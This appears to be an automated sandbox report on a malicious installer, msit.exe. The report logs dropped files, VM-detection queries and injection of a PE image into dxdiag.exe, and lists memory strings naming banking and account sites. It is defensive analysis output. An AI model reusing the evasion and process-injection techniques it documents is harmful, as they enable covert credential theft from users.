Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\msit.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: msit.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: msit.exe

Static file information: File size 20182372 > 1048576

Source: msit.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c5800

Source: msit.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: msit.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: msit.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: msit.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: msit.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: msit.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: msit.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: msit.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wininet.pdb source: shi95F5.tmp.0.dr
Source:	Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcomp140_app.pdb source: msit.msi.0.dr
Source:	Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb!! source: msit.msi.0.dr
Source:	Binary string: ucrtbase.pdb source: msit.msi.0.dr
Source:	Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\vcruntime140_app.pdb source: msit.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: MSIA2EC.tmp.2.dr, MSI986D.tmp.0.dr, MSI97FE.tmp.0.dr, MSI982E.tmp.0.dr, msit.msi.0.dr
Source:	Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb source: msit.msi.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msit.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: MSIA28C.tmp.2.dr, msit.msi.0.dr
Source:	Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcamp140_app.pdb source: msit.msi.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: msit.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: MSIA28C.tmp.2.dr, msit.msi.0.dr
Source:	Binary string: wininet.pdbUGP source: shi95F5.tmp.0.dr
Source:	Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vccorlib140_app.pdb source: msit.msi.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msit.msi.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: msit.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: msit.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: MSIA20D.tmp.2.dr, MSI9720.tmp.0.dr, msit.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: msit.exe
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: msit.msi.0.dr
Source:	Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\msvcp140_app.pdb source: msit.msi.0.dr

Source: msit.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: msit.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: msit.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: msit.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: msit.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: shi95F5.tmp.0.dr

Static PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]

Source: msit.exe	Static PE information: section name: .didat
Source: msit.exe	Static PE information: section name: .fptable
Source: MSI98AD.tmp.0.dr	Static PE information: section name: .didat
Source: MSI98AD.tmp.0.dr	Static PE information: section name: .fptable
Source: MSI98DD.tmp.0.dr	Static PE information: section name: .didat
Source: MSI98DD.tmp.0.dr	Static PE information: section name: .fptable
Source: shi95F5.tmp.0.dr	Static PE information: section name: .wpp_sf
Source: shi95F5.tmp.0.dr	Static PE information: section name: .didat
Source: MSI96A2.tmp.0.dr	Static PE information: section name: .fptable
Source: MSI9720.tmp.0.dr	Static PE information: section name: .fptable
Source: MSI9760.tmp.0.dr	Static PE information: section name: .fptable
Source: MSI9790.tmp.0.dr	Static PE information: section name: .fptable
Source: MSI97FE.tmp.0.dr	Static PE information: section name: .didat
Source: MSI97FE.tmp.0.dr	Static PE information: section name: .fptable
Source: MSI982E.tmp.0.dr	Static PE information: section name: .didat
Source: MSI982E.tmp.0.dr	Static PE information: section name: .fptable
Source: MSI986D.tmp.0.dr	Static PE information: section name: .didat
Source: MSI986D.tmp.0.dr	Static PE information: section name: .fptable
Source: MSIA6C8.tmp.0.dr	Static PE information: section name: .didat
Source: MSIA6C8.tmp.0.dr	Static PE information: section name: .fptable
Source: MSIA708.tmp.0.dr	Static PE information: section name: .didat
Source: MSIA708.tmp.0.dr	Static PE information: section name: .fptable
Source: MSIA16F.tmp.2.dr	Static PE information: section name: .fptable
Source: MSIA1CE.tmp.2.dr	Static PE information: section name: .fptable
Source: MSIA20D.tmp.2.dr	Static PE information: section name: .fptable
Source: MSIA23D.tmp.2.dr	Static PE information: section name: .fptable
Source: MSIA28C.tmp.2.dr	Static PE information: section name: .fptable
Source: MSIA2BC.tmp.2.dr	Static PE information: section name: .fptable
Source: MSIA2EC.tmp.2.dr	Static PE information: section name: .didat
Source: MSIA2EC.tmp.2.dr	Static PE information: section name: .fptable
Source: MSIA455.tmp.2.dr	Static PE information: section name: .fptable
Source: MSIA455.tmp.2.dr	Static PE information: section name: _RDATA

Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00442904 push es; ret	7_2_00442905
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_00438A00 push eax; mov dword ptr [esp], BEBFA0A1h	7_2_00438A0E
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_004423EC push es; ret	7_2_004423ED
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 7_2_0043B690 push eax; mov dword ptr [esp], E3E2E1D0h	7_2_0043B692

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe

Executable created and started: C:\Windows\Installer\MSIA455.tmp

Jump to behavior

Source: C:\Users\user\Desktop\msit.exe	File created: C:\Users\user\AppData\Local\Temp\MSIA708.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA20D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA28C.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	File created: C:\Users\user\AppData\Local\Temp\MSI97FE.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	File created: C:\Users\user\AppData\Local\Temp\MSI98AD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA23D.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	File created: C:\Users\user\AppData\Local\Temp\MSI98DD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA16F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA2BC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA2EC.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	File created: C:\Users\user\AppData\Local\Temp\MSI96A2.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA455.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	File created: C:\Users\user\AppData\Local\Temp\MSI9720.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	File created: C:\Users\user\AppData\Local\Temp\MSI9760.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	File created: C:\Users\user\AppData\Local\Temp\MSI9790.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	File created: C:\Users\user\AppData\Local\Temp\shi95F5.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	File created: C:\Users\user\AppData\Local\Temp\MSI982E.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	File created: C:\Users\user\AppData\Local\Temp\MSIA6C8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA1CE.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	File created: C:\Users\user\AppData\Local\Temp\MSI986D.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA20D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA28C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA23D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA16F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA2BC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA2EC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA455.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA1CE.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\msit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\dxdiag.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIA20D.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIA708.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIA28C.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI97FE.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI98AD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIA23D.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI98DD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIA2BC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIA16F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIA2EC.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI96A2.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9720.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9760.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9790.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi95F5.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIA6C8.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI982E.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIA1CE.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\msit.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI986D.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\dxdiag.exe TID: 3284	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe TID: 6072	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\msit.exe	File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	File Volume queried: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	File Volume queried: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6 FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\msit.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	File opened: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	File opened: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	File opened: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\	Jump to behavior

Source: dxdiag.exe, 00000007.00000003.1625067997.0000000005253000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: msit.msi.0.dr	Binary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: dxdiag.exe, 00000007.00000002.1708428233.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708428233.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: dxdiag.exe, 00000007.00000002.1708428233.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWW
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe

Code function: 7_2_00439E40 LdrInitializeThunk,

7_2_00439E40

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\Installer\MSIA455.tmp "C:\Windows\Installer\MSIA455.tmp"

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Windows\Installer\MSIA455.tmp

Memory allocated: C:\Windows\SysWOW64\dxdiag.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\Installer\MSIA455.tmp

Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\Installer\MSIA455.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000	Jump to behavior
Source: C:\Windows\Installer\MSIA455.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 401000	Jump to behavior
Source: C:\Windows\Installer\MSIA455.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 43E000	Jump to behavior
Source: C:\Windows\Installer\MSIA455.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 441000	Jump to behavior
Source: C:\Windows\Installer\MSIA455.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 451000	Jump to behavior
Source: C:\Windows\Installer\MSIA455.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 452000	Jump to behavior
Source: C:\Windows\Installer\MSIA455.tmp	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 2BC0008	Jump to behavior

Source: C:\Windows\Installer\MSIA455.tmp

Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"

Jump to behavior

Source: C:\Users\user\Desktop\msit.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\msit\msit 1.0.1\install\c07caf6\msit.msi" /qn /norestart ai_setupexepath=c:\users\user\desktop\msit.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1736753519 "
Source: C:\Users\user\Desktop\msit.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\msit\msit 1.0.1\install\c07caf6\msit.msi" /qn /norestart ai_setupexepath=c:\users\user\desktop\msit.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1736753519 "			Jump to behavior

Source: C:\Users\user\Desktop\msit.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Installer\MSIA455.tmp

Code function: 6_2_00007FF68E585D6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

6_2_00007FF68E585D6C

Source: C:\Windows\SysWOW64\dxdiag.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: dxdiag.exe, 00000007.00000003.1697639523.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1681864403.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708678569.0000000002F4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ndows Defender\MsMpeng.exe
